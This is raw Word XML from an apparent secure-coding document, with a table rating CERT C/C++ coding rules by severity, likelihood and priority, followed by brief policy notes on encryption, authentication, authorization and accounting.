      <w:tr w:rsidR="008C066B" w14:paraId="5E698A8A" w14:textId="77777777" w:rsidTr="00F21822">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5221428A" w14:textId="4AF1CD49" w:rsidR="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:r>
              <w:t>DCL-012-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61027C5A" w14:textId="7AB05AAE" w:rsidR="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:r>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="376968D4" w14:textId="73AFD251" w:rsidR="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:r>
              <w:t>Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61E76894" w14:textId="7D07C868" w:rsidR="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05A3CE43" w14:textId="51B67E0D" w:rsidR="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:r>
              <w:t>P1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="782C814E" w14:textId="0AF363A1" w:rsidR="008C066B" w:rsidRDefault="008C066B" w:rsidP="008C066B">
            <w:r>
              <w:t>L3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21822" w14:paraId="4E346B29" w14:textId="77777777" w:rsidTr="00F21822">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11F4BE0E" w14:textId="6ACF3B27" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:bookmarkStart w:id="24" w:name="_Hlk74517738"/>
            <w:r w:rsidRPr="007B16AC">
              <w:t>INT</w:t>
            </w:r>
            <w:r>
              <w:t>-0</w:t>
            </w:r>
            <w:r w:rsidRPr="007B16AC">
              <w:t>30-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="752BE477" w14:textId="465EC450" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="007B16AC">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FE8B114" w14:textId="1859B778" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="007B16AC">
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CDE0BE2" w14:textId="68643312" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="007B16AC">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D7A98BF" w14:textId="3C607BF6" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="007B16AC">
              <w:t>P9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2342A158" w14:textId="4522CDD2" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="007B16AC">
              <w:t>L2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21822" w14:paraId="334DB08B" w14:textId="77777777" w:rsidTr="00F21822">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BFFD498" w14:textId="1B061355" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>STR</w:t>
            </w:r>
            <w:r>
              <w:t>-0</w:t>
            </w:r>
            <w:r w:rsidRPr="00A240F5">
              <w:t>30-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="308B96BF" w14:textId="01E5C5E8" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7622FAD2" w14:textId="1F418ACE" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36FD3789" w14:textId="55352FA1" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B485651" w14:textId="3274C608" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>P9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11242936" w14:textId="0FA1E8D3" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>L2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21822" w14:paraId="2F0514EA" w14:textId="77777777" w:rsidTr="00F21822">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="467A999D" w14:textId="1A70B37C" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>STR</w:t>
            </w:r>
            <w:r>
              <w:t>-0</w:t>
            </w:r>
            <w:r w:rsidRPr="00A240F5">
              <w:t>02-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6864030F" w14:textId="7B2F0B38" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FD64D49" w14:textId="476BDC91" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B5FC682" w14:textId="74509C44" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="644F2CA9" w14:textId="1BEAFC35" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>P18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C713B84" w14:textId="721E32F8" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>L1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21822" w14:paraId="4E676554" w14:textId="77777777" w:rsidTr="00F21822">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7100264D" w14:textId="1E69F280" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>MEM</w:t>
            </w:r>
            <w:r>
              <w:t>-0</w:t>
            </w:r>
            <w:r w:rsidRPr="00A240F5">
              <w:t>53-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DCA5B40" w14:textId="37D2C50C" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="471B62B8" w14:textId="074BCD74" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00A6F6BA" w14:textId="0F523D7B" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2053F4CB" w14:textId="55DE2E82" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>P18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FE2E491" w14:textId="09EB04CC" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>L1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21822" w14:paraId="2909CEA7" w14:textId="77777777" w:rsidTr="00F21822">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FA73728" w14:textId="59BAF3D5" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>ERR</w:t>
            </w:r>
            <w:r>
              <w:t>-0</w:t>
            </w:r>
            <w:r w:rsidRPr="00A240F5">
              <w:t>06-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CFBEC18" w14:textId="43B04C57" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="679D4A94" w14:textId="4E45F87F" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18430555" w14:textId="58626467" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E304121" w14:textId="4D2234D2" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>P4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C3F721D" w14:textId="2993AD4D" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>L3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21822" w14:paraId="007D0FBC" w14:textId="77777777" w:rsidTr="00F21822">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7849A9EA" w14:textId="6992264D" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>ERR</w:t>
            </w:r>
            <w:r>
              <w:t>-0</w:t>
            </w:r>
            <w:r w:rsidRPr="00A240F5">
              <w:t>51-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D0880A0" w14:textId="27C5C7FA" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A3B5577" w14:textId="2A4B0209" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>Probable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="214A79D1" w14:textId="1BCE7801" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41301A9F" w14:textId="25E6F291" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>P4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D7A1B7A" w14:textId="69222592" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00A240F5">
              <w:t>L3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21822" w14:paraId="30EB0D27" w14:textId="77777777" w:rsidTr="00F21822">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58D14EE0" w14:textId="39701D3B" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00244946">
              <w:t>OOP</w:t>
            </w:r>
            <w:r>
              <w:t>-0</w:t>
            </w:r>
            <w:r w:rsidRPr="00244946">
              <w:t>52-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70CBCE53" w14:textId="66F5FF96" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00244946">
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55B7417C" w14:textId="6B7EA1A9" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00244946">
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72580B49" w14:textId="276C94C8" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00244946">
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36B5D62C" w14:textId="5AE8FFA4" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00244946">
              <w:t>P9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78E62A20" w14:textId="2C83E5A1" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00244946">
              <w:t>L2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21822" w14:paraId="1A8BA019" w14:textId="77777777" w:rsidTr="00F21822">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44647100" w14:textId="2969BB3A" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00244946">
              <w:t>INT</w:t>
            </w:r>
            <w:r>
              <w:t>-0</w:t>
            </w:r>
            <w:r w:rsidRPr="00244946">
              <w:t>35-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C4FF30D" w14:textId="6F35AA81" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00244946">
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="022C22B4" w14:textId="084A3657" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00244946">
              <w:t>Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="723BF2DC" w14:textId="5BBC84BF" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00244946">
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00E0C6DB" w14:textId="55992D71" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00244946">
              <w:t>P2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A397D60" w14:textId="423BD653" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00244946">
              <w:t>L3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21822" w14:paraId="6278442F" w14:textId="77777777" w:rsidTr="00F21822">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="7989A450" w14:textId="3AC5C602" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00244946">
              <w:t>STR</w:t>
            </w:r>
            <w:r>
              <w:t>-0</w:t>
            </w:r>
            <w:r w:rsidRPr="00244946">
              <w:t>38-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="30718AF9" w14:textId="6B337C0A" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00244946">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1349" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="0EED3A51" w14:textId="44219215" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00244946">
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1856" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="3DE2F052" w14:textId="0336460E" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00244946">
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="462A4AC9" w14:textId="75853BEC" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00244946">
              <w:t>P27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="5F83E86B" w14:textId="4C9354C9" w:rsidR="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00244946">
              <w:t>L1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="24"/>
    </w:tbl>
    <w:p w14:paraId="065B3FB5" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00381847"/>
    <w:p w14:paraId="75A7A4D8" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc52464076"/>
      <w:r>
        <w:lastRenderedPageBreak/>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5F7ADE9" w:rsidR="00381847" w:rsidRDefault="00017B23">
            <w:r>
              <w:t>Ensure that data is encrypted when on a disk. This policy applies as it is used to secure sensitive data. If an attacker obtains a hard drive (perhaps internally) with sensitive data, the attacker still requires encryption keys to utilize that data.</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0FADBFB" w:rsidR="00381847" w:rsidRDefault="00017B23">
            <w:r>
              <w:t xml:space="preserve">Ensure that data is encrypted while being transmitted. Data must be passed from place to place at some point. To secure this transmitted data, encryption at flight must be utilized. Often attackers may look to use cloud connection, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>wifi-esq</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> vulnerabilities to access data mid transfer. If this data is sensitive, it must be encrypted.</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091961A" w:rsidR="00381847" w:rsidRDefault="00017B23">
            <w:r>
              <w:t xml:space="preserve">Ensure that sensitive data is encrypted at all stages. Encryption in use ensures that data never is unsecured. </w:t>
            </w:r>
            <w:r w:rsidR="00885C97">
              <w:t>This policy applies, that it practices defense in depth. Each gateway for attack has multiple layers of defense. These defensive layers are constantly at work</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13229B2" w:rsidR="00381847" w:rsidRDefault="00885C97">
            <w:r>
              <w:t>Authentication involves confirming the right person is accessing the system. By proving authentication, a user is providing the system a way to reject or accept them based on acceptable criteria. This policy applies to any user who attempts to access sensitive data. An authentication system should be put in place as one of the first layers of defense.</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3561A2E" w:rsidR="00381847" w:rsidRDefault="00885C97">
            <w:r>
              <w:t>Authorization refers to an authenticated user’s rights and privileges. This policy applies as, a user should only be given authorization to meet the minimum needs required. By limiting the amount of accessibility, less trusted individuals have less resources to potentially cause harm to the system.</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E0CB9BA" w:rsidR="00381847" w:rsidRDefault="00885C97">
            <w:r>
              <w:t>Accounting is monitoring activities and recording actions for compliance and security purposes. Accounting is a crucial step. Through accounting, risky behavior can be addressed early before damage is done. Accountability can be pursued on users within the system, as proof of actions is available. Lastly, successful attackers can leave a trail which shows the error or exploitable portions of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lastRenderedPageBreak/>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54C20">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7" w:name="_Toc52464078"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rP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8" w:name="_Toc52464079"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rP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9" w:name="_Toc52464080"/>
      <w:r>
        <w:rPr>
